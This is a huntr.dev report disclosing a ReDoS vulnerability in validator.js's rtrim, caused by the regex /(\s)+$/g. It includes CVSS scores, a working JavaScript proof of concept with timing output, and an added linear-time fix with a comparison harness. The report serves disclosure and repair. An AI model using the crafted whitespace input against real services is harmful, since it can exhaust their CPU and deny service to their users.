huntr | yetingli | C37E975C-21A3-4C5F-9B57-04D63B28CFC9
History: Sep 21, 2021 - 8:41 a.m.

Inefficient Regular Expression Complexity in validatorjs/validator.js

2021-09-21 08:41:23
yetingli
www.huntr.dev
17

7.5 High (CVSS3)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium (CVSS2)

Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS: 0.001 Low
Percentile: 37.1%

Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows causing a denial of service when calling the function 'rtrim'.

The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator");

// Build ever-longer inputs of the shape 'a' + spaces + 'a' and time rtrim on each;
// the trailing 'a' forces the regex to backtrack over the whole run of spaces.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'a' + ' '.repeat(i * 10000) + "a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

The Output

"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"

Reference

I have opened an issue before, but it is still not safe after the fix.

For repair, you can refer to the rtrim function in the package trim.
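The regex named in the description and the repair suggested above can be checked side by side. The following is an added example, not code from the huntr report or from the validator.js or trim projects: it keeps the reported pattern /(\s)+$/g as the "before", puts a linear backwards scan (my own implementation, not the upstream fix) beside it as the "after", and times both on the same input shape the PoC uses. The function names, the `attackString` builder and the sizes are my own choices.

```javascript
// Added example: the quadratic right-trim regex from the report next to a
// linear-time right-trim, with a small harness to compare them.

// The pattern cited in the report. On 'a' + spaces + 'a' the engine starts
// (\s)+ at every space, runs greedily to the final 'a', fails on $, then
// backtracks through every shorter match before moving on: O(n^2) steps
// for a run of n spaces.
const VULNERABLE_RTRIM_RE = /(\s)+$/g;

function rtrimRegex(str) {
  return str.replace(VULNERABLE_RTRIM_RE, '');
}

// Linear-time replacement (hypothetical, not validator.js code): walk back
// from the end and cut at the last non-whitespace character. Every character
// is examined at most once, so cost is O(n) whatever the input looks like.
function rtrimLinear(str) {
  if (typeof str !== 'string') {
    throw new TypeError('rtrimLinear expects a string');
  }
  let end = str.length;
  while (end > 0 && /\s/.test(str.charAt(end - 1))) {
    end -= 1;
  }
  return str.slice(0, end);
}

// Builds the input shape from the report: a run of spaces fenced by 'a' so
// the trailing anchor never matches. The size is constructed for the demo.
function attackString(spaces) {
  return 'a' + ' '.repeat(spaces) + 'a';
}

// Runs both implementations on the same input and reports wall-clock
// milliseconds for each, plus the input length.
function timeBoth(spaces) {
  const input = attackString(spaces);

  const t0 = Date.now();
  rtrimRegex(input);
  const regexMs = Date.now() - t0;

  const t1 = Date.now();
  rtrimLinear(input);
  const linearMs = Date.now() - t1;

  return { length: input.length, regexMs, linearMs };
}

// Stand-alone run: grows the input the way the PoC does, but stops at sizes
// that finish in about a second so the curve is visible without a hang.
for (const spaces of [5000, 10000, 20000]) {
  console.log(timeBoth(spaces));
}
```

The regex column should grow roughly fourfold each time the input doubles, matching the output the reporter pasted, while the linear column stays near zero; on inputs with real trailing whitespace both functions return the same string, which is what makes the scan a drop-in replacement.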
